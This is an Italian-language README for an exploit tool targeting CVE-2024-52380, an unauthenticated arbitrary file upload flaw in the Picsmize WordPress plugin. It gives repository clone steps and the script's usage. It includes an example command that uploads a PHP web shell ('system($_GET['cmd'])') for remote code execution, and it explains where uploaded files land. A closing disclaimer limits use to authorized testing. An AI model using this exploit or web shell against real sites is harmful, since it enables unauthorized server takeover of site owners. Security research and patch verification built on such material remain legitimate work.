
Il plugin Picsmize per WordPress è vulnerabile al caricamento arbitrario di file.
Il plugin Picsmize per WordPress è vulnerabile al caricamento arbitrario di file.
Questo script sfrutta una vulnerabilità (CVE-2024-52380) nel plugin Picsmize per WordPress, consentendo ad attaccanti non autenticati di effettuare caricamenti arbitrari di file. La vulnerabilità è presente in tutte le versioni di Picsmize fino alla 1.0.0 inclusa. Lo sfruttamento di questa vulnerabilità può portare all'esecuzione remota di codice sul server di destinazione.
requests (pip install requests)git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
cd CVE-2024-52380-Exploit
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]
Check plugin version and upload a PHP file to a WordPress site.
options:
-h, --help show this help message and exit
-u URL, --url URL Base URL of the WordPress site (e.g., http://192.168.100.74:888).
-c CONTENT, --content CONTENT
Content of the PHP file to be uploaded.
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"
Lo script fornisce due argomenti da riga di comando per facilità d'uso:
-u / --url (obbligatorio):
-u http://example.com
-c / --content (opzionale):
<?php phpinfo(); ?>
-c "<?php system($_GET['cmd']); ?>"
/wordpress: Directory root del sito WordPress.wp-content/uploads: Directory predefinita per i caricamenti multimediali in WordPress.2025/01: La struttura delle directory corrisponde all'anno (2025) e al mese (Gennaio) in base alla configurazione della data del server.Questo script è destinato esclusivamente a scopi educativi e a test di sicurezza autorizzati. L'uso non autorizzato di questo strumento contro sistemi di cui non si possiede la proprietà o per cui non si ha esplicita autorizzazione è illegale e non etico.